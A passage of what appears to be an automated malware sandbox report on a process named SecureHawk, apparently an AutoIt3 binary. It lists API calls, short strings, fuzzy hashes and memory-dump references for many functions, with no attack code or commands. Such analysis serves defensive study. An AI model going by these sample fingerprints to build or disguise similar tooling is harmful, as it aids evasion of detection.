                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: __itow_s
                                  • String ID: xr;$xr;
                                  • API String ID: 3653519197-188782526
                                  • Opcode ID: 37283d13a4e798eeaa85c1702ab59fa329ed3adbc863dc13d2799218ea58c3b1
                                  • Instruction ID: 0ccfd117c1d2229101d068594b4a306720a3e3294d01f660d8ce23901042dcec
                                  • Opcode Fuzzy Hash: 37283d13a4e798eeaa85c1702ab59fa329ed3adbc863dc13d2799218ea58c3b1
                                  • Instruction Fuzzy Hash: 31B17D74A00109EBCB25DF54C891EBAFBB9EF48300F148569FA45DB296DB71E981CF60
                                  APIs
                                  • OleSetContainedObject.OLE32(?,00000001), ref: 0034BE3A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: ContainedObject
                                  • String ID: AutoIt3GUI$Container
                                  • API String ID: 3565006973-3941886329
                                  • Opcode ID: 3e51177faefcbb32749c8a1fb6f7139adfb485c5900ed6a227349ac31fb2ab95
                                  • Instruction ID: 71c6573310802797d772a4c0783cfbff30e179362dbb26fb7f5958f8c1a232d9
                                  • Opcode Fuzzy Hash: 3e51177faefcbb32749c8a1fb6f7139adfb485c5900ed6a227349ac31fb2ab95
                                  • Instruction Fuzzy Hash: F8913A70600601AFDB55DF64C884AA6B7F9FF49710F10856DE94ACF691DBB1E881CB60
                                  APIs
                                    • Part of subcall function 0030436A: _wcscpy.LIBCMT ref: 0030438D
                                    • Part of subcall function 002F4D37: __itow.LIBCMT ref: 002F4D62
                                    • Part of subcall function 002F4D37: __swprintf.LIBCMT ref: 002F4DAC
                                  • __wcsnicmp.LIBCMT ref: 0035B4DD
                                  • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0035B5A6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                  • String ID: LPT
                                  • API String ID: 3222508074-1350329615
                                  • Opcode ID: d0047254c15cb5739a24847aba1c492cf0c9a394907785a9287bf312945c964c
                                  • Instruction ID: ae8498c897a19c59aba78f016a62b4d6b4657423d5a53aae1933d9838fa2dc84
                                  • Opcode Fuzzy Hash: d0047254c15cb5739a24847aba1c492cf0c9a394907785a9287bf312945c964c
                                  • Instruction Fuzzy Hash: A8619375A00219AFCB19EF54C891EBEF7B4EF09311F114469F946AB2A1D770AE44CB50
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: _memmove
                                  • String ID: #V0
                                  • API String ID: 4104443479-259189717
                                  • Opcode ID: 5339cc015c2a9ceb2914e43671e2f12214decd6ef10b8ca14eb37c17c7571bb6
                                  • Instruction ID: cd80ceb6552ccc0f83f1186927c1e11ed24b1417cd230fc31ee381393a1e79dd
                                  • Opcode Fuzzy Hash: 5339cc015c2a9ceb2914e43671e2f12214decd6ef10b8ca14eb37c17c7571bb6
                                  • Instruction Fuzzy Hash: B05182B0E01609DFCF2ACFA8C984AAEB7F5FF44314F108529E85AD7250E731A955CB51
                                  APIs
                                  • Sleep.KERNEL32(00000000), ref: 002FE01E
                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 002FE037
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: GlobalMemorySleepStatus
                                  • String ID: @
                                  • API String ID: 2783356886-2766056989
                                  • Opcode ID: c928ab29d328ae2b7adaf65c3fb0b98879f445f9a2bc1fcefd30d717565daec4
                                  • Instruction ID: c5a142f182505595e87b64328e4e1d9a65eada67b8564fdb8cf3048cbb9ac410
                                  • Opcode Fuzzy Hash: c928ab29d328ae2b7adaf65c3fb0b98879f445f9a2bc1fcefd30d717565daec4
                                  • Instruction Fuzzy Hash: 6F5178724187489BE321AF10E886BABFBFCFB84354F41485DF2D8410A1DBB19579CB56
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: ClearVariant
                                  • String ID: Dt;$Dt;
                                  • API String ID: 1473721057-3388014839
                                  • Opcode ID: 71d49d6e77cbba1dc2b8350b9d43d1ca9aa14bc6ed824f8375ec899bac26133e
                                  • Instruction ID: 7ae0faaca53d2cf6b1d30f180b57a4d34f981d1bbb234375a1acb4b267c0ace2
                                  • Opcode Fuzzy Hash: 71d49d6e77cbba1dc2b8350b9d43d1ca9aa14bc6ed824f8375ec899bac26133e
                                  • Instruction Fuzzy Hash: 0C414978614A16CFD715DF19C080A2AFBE5FF98384F64886DEA958B320D770E891CF81
                                  APIs
                                  • _memset.LIBCMT ref: 00362A4E
                                  • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00362A84
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: CrackInternet_memset
                                  • String ID: |
                                  • API String ID: 1413715105-2343686810
                                  • Opcode ID: 37b77ada3c554d3afa46a36b40eb7d31478b1d52bdf1d2f629124150c19e35f8
                                  • Instruction ID: db49bd599671d19091f389e3f3e5bf8baca08a375259dfd6bc094a914b2cf2af
                                  • Opcode Fuzzy Hash: 37b77ada3c554d3afa46a36b40eb7d31478b1d52bdf1d2f629124150c19e35f8
                                  • Instruction Fuzzy Hash: 13313971C11219ABCF56EFA0CC85AEFBFB8FF08304F104059F814AA166EB319956DB60
                                  APIs
                                  • DestroyWindow.USER32(?,?,?,?), ref: 00376F04
                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00376F40
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Window$DestroyMove
                                  • String ID: static
                                  • API String ID: 2139405536-2160076837
                                  • Opcode ID: 409d2b2b60376bc4fa84a0f0cd231b69707a09382fa9aac3922d1e745be89cdc
                                  • Instruction ID: 027e04d2556c8a5375ee3ecd1e076842de5658f3d0d6e8c145253360584bc7e4
                                  • Opcode Fuzzy Hash: 409d2b2b60376bc4fa84a0f0cd231b69707a09382fa9aac3922d1e745be89cdc
                                  • Instruction Fuzzy Hash: AD31C171100608AEEB229F34DC91BFB73B9FF88764F019619F99987191DB34AC91DB60
                                  APIs
                                  • _memset.LIBCMT ref: 00352F24
                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00352F5F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: InfoItemMenu_memset
                                  • String ID: 0
                                  • API String ID: 2223754486-4108050209
                                  • Opcode ID: a23d122f621887ef4351c74b1da805a96b33816dfabba9e61a74a2b14402214c
                                  • Instruction ID: 2ff1440d230a80b8f24e0c06447996822aad37790157c8117e25084a707fdb2b
                                  • Opcode Fuzzy Hash: a23d122f621887ef4351c74b1da805a96b33816dfabba9e61a74a2b14402214c
                                  • Instruction Fuzzy Hash: DC31D532600205ABEB2A9F48E885FAFBBB8EF06351F150019FD85D61B0D7709A48DB51
                                  APIs
                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00376B4E
                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00376B59
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID: Combobox
                                  • API String ID: 3850602802-2096851135
                                  • Opcode ID: 661c1d3fb582371653ed3c7a697bfe4e845bb90be1a9e3903c4d8e3d0f194e94
                                  • Instruction ID: 67125facf33863a0fd1883a7bb2aca5e0bcc9ba818993ab61419b12fa6d7e878
                                  • Opcode Fuzzy Hash: 661c1d3fb582371653ed3c7a697bfe4e845bb90be1a9e3903c4d8e3d0f194e94
                                  • Instruction Fuzzy Hash: B411B671300608AFEF239E15CCA2EFB376EEB893A4F118125F91CE7291D6799C518760
                                  APIs
                                    • Part of subcall function 002F29E2: GetWindowLongW.USER32(?,000000EB), ref: 002F29F3
                                  • GetActiveWindow.USER32 ref: 0037B1C3
                                  • EnumChildWindows.USER32(?,0037AEA3,00000000), ref: 0037B23D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Window$ActiveChildEnumLongWindows
                                  • String ID: 6
                                  • API String ID: 3814560230-4065977057
                                  • Opcode ID: 1c5b853997ddebab9a8259c665d1c5d190dd7bee03f44edad794d942e0328dc7
                                  • Instruction ID: b946cf7e816814be83df0a8000aa103019efb300eeed4efcaf32f40077d77759
                                  • Opcode Fuzzy Hash: 1c5b853997ddebab9a8259c665d1c5d190dd7bee03f44edad794d942e0328dc7
                                  • Instruction Fuzzy Hash: 98212135204201DFC726DF28D852AA5B3F9EF49364F21471DE969877A1CB346810CF60
                                  APIs
                                    • Part of subcall function 002F2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 002F214F
                                    • Part of subcall function 002F2111: GetStockObject.GDI32(00000011), ref: 002F2163
                                    • Part of subcall function 002F2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 002F216D
                                  • GetWindowRect.USER32(00000000,?), ref: 0037705E
                                  • GetSysColor.USER32(00000012), ref: 00377078
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                  • String ID: static
                                  • API String ID: 1983116058-2160076837
                                  • Opcode ID: fae6e191d6e0c6bbe47dc2096c5295399bf8ebd5c55118f8d1325a124f9bf462
                                  • Instruction ID: a509b893a528d5ca0595ec5b91b7b49fdf65aca699d44975e41c47f12f18c12f
                                  • Opcode Fuzzy Hash: fae6e191d6e0c6bbe47dc2096c5295399bf8ebd5c55118f8d1325a124f9bf462
                                  • Instruction Fuzzy Hash: 66214772614209AFDB15DFB8CC46EFABBA8EB08304F014658FE59D2241E734A850DB50
                                  APIs
                                  • GetWindowTextLengthW.USER32(00000000), ref: 00376D8F
                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00376D9E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: LengthMessageSendTextWindow
                                  • String ID: edit
                                  • API String ID: 2978978980-2167791130
                                  • Opcode ID: 92f0f1801c7381f714faf9ef6baa4e20cfb4747d6f27abddde4f8d1b87c8e996
                                  • Instruction ID: a31e9866ac1d3621287e09595cf60fc1ba29e4a8f8a68d1ad96977e552c10ee7
                                  • Opcode Fuzzy Hash: 92f0f1801c7381f714faf9ef6baa4e20cfb4747d6f27abddde4f8d1b87c8e996
                                  • Instruction Fuzzy Hash: 5811B231620608AFEB329E64DCA6AF7376DEF05368F118314FA68971E0C779DC549B60
                                  APIs
                                  • _memset.LIBCMT ref: 00353036
                                  • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00353055
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: InfoItemMenu_memset
                                  • String ID: 0
                                  • API String ID: 2223754486-4108050209
                                  • Opcode ID: 666aa102f0eea2fc82f1d90b66aab2461ee30ee87a8361260f4327d47f568e09
                                  • Instruction ID: 99d77ed7e7d3a07199c0f1aafe0e793ae5fc76c59659d1d0d26e62a925f7aa8f
                                  • Opcode Fuzzy Hash: 666aa102f0eea2fc82f1d90b66aab2461ee30ee87a8361260f4327d47f568e09
                                  • Instruction Fuzzy Hash: BE11BE32900314ABDB26DB58DC04FA973BCAB06785F060125ED16E72F0D730AE08C7A1
                                  APIs
                                  • DeleteObject.GDI32(?), ref: 002F351D
                                  • DestroyWindow.USER32(?,?,00304E61), ref: 002F3576
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: DeleteDestroyObjectWindow
                                  • String ID: h8
                                  • API String ID: 2587070983-1078280285
                                  • Opcode ID: 9e8a0b87a3a93c334d89dd76908d974f2244d95dfc5cb27b765259fc617bd82b
                                  • Instruction ID: cb0ceb7d2d7000ac2a59ab18c00a167ac1dfc8341a860f2d3e34a991aaa6c53f
                                  • Opcode Fuzzy Hash: 9e8a0b87a3a93c334d89dd76908d974f2244d95dfc5cb27b765259fc617bd82b
                                  • Instruction Fuzzy Hash: D6215470621215CFDB1ADF14E856B35B3E9ABC8758F444279E606CB262CB39DE60CF40
                                  APIs
                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 003626DC
                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00362705
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Internet$OpenOption
                                  • String ID: <local>
                                  • API String ID: 942729171-4266983199
                                  • Opcode ID: 0acabe3fe1e98c861f072487427b27f6972f786b04f472851eeafc10b8a109e6
                                  • Instruction ID: e8c8a1e9e20421671d34dc1c90fcaf5fde9e007dc1e4798b61df4fa853a6de1c
                                  • Opcode Fuzzy Hash: 0acabe3fe1e98c861f072487427b27f6972f786b04f472851eeafc10b8a109e6
                                  • Instruction Fuzzy Hash: FB11E370501A25BADB268F51CC84EF7FBACFF02351F12C11AF50556404D2B06994CBF0
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: _wcscmp
                                  • String ID: 0.0.0.0$L,8
                                  • API String ID: 856254489-2746457930
                                  • Opcode ID: eb168fe4729bdb348696f9729fe003f5f152bdca946f4eeedb7f38bf42a9f80c
                                  • Instruction ID: 6ea3324ee48d022a41534c06fba3e1fe7741b924bafa9f7073c5947be5581e49
                                  • Opcode Fuzzy Hash: eb168fe4729bdb348696f9729fe003f5f152bdca946f4eeedb7f38bf42a9f80c
                                  • Instruction Fuzzy Hash: A411C435310208AFCB15EE14C981EAAB7B9AF89714F108099FE095F3A1CA70ED46CB50
                                  APIs
                                    • Part of subcall function 003684A8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00368265,?,00000000,?,?), ref: 003684BF
                                  • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00368268
                                  • htons.WSOCK32(00000000,?,00000000), ref: 003682A5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: ByteCharMultiWidehtonsinet_addr
                                  • String ID: 255.255.255.255
                                  • API String ID: 2496851823-2422070025
                                  • Opcode ID: 1a48bbdcb5391088fa5b5b5dadf07cba6e14e2663bb455d50957158ba08efaed
                                  • Instruction ID: 86077dc5b66c2727e09732ecf300f586a39aa7161e8e2bca13901776899d237e
                                  • Opcode Fuzzy Hash: 1a48bbdcb5391088fa5b5b5dadf07cba6e14e2663bb455d50957158ba08efaed
                                  • Instruction Fuzzy Hash: 2C11E535100605ABDB12EF54CC56FBDB374FF04320F108616F9115B2C5DA71A805C791
                                  APIs
                                    • Part of subcall function 00301A36: _memmove.LIBCMT ref: 00301A77
                                    • Part of subcall function 0034B57D: GetClassNameW.USER32(?,?,000000FF), ref: 0034B5A0
                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0034980E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: ClassMessageNameSend_memmove
                                  • String ID: ComboBox$ListBox
                                  • API String ID: 372448540-1403004172
                                  • Opcode ID: 1f2fedf5d4fa8a2e7cb22b75b3c3b56783309c90b04de56e1210734bd4e057d6
                                  • Instruction ID: ba68a62b20fad01ccaccc970c8327767b40d5aba6de533f84323b7e86f333a47
                                  • Opcode Fuzzy Hash: 1f2fedf5d4fa8a2e7cb22b75b3c3b56783309c90b04de56e1210734bd4e057d6
                                  • Instruction Fuzzy Hash: CE01B571A42214ABCB16EBA4CC619FFB7ADEF12360B50061AF8615F2C1EE356808D750
                                  APIs
                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 002FBC07
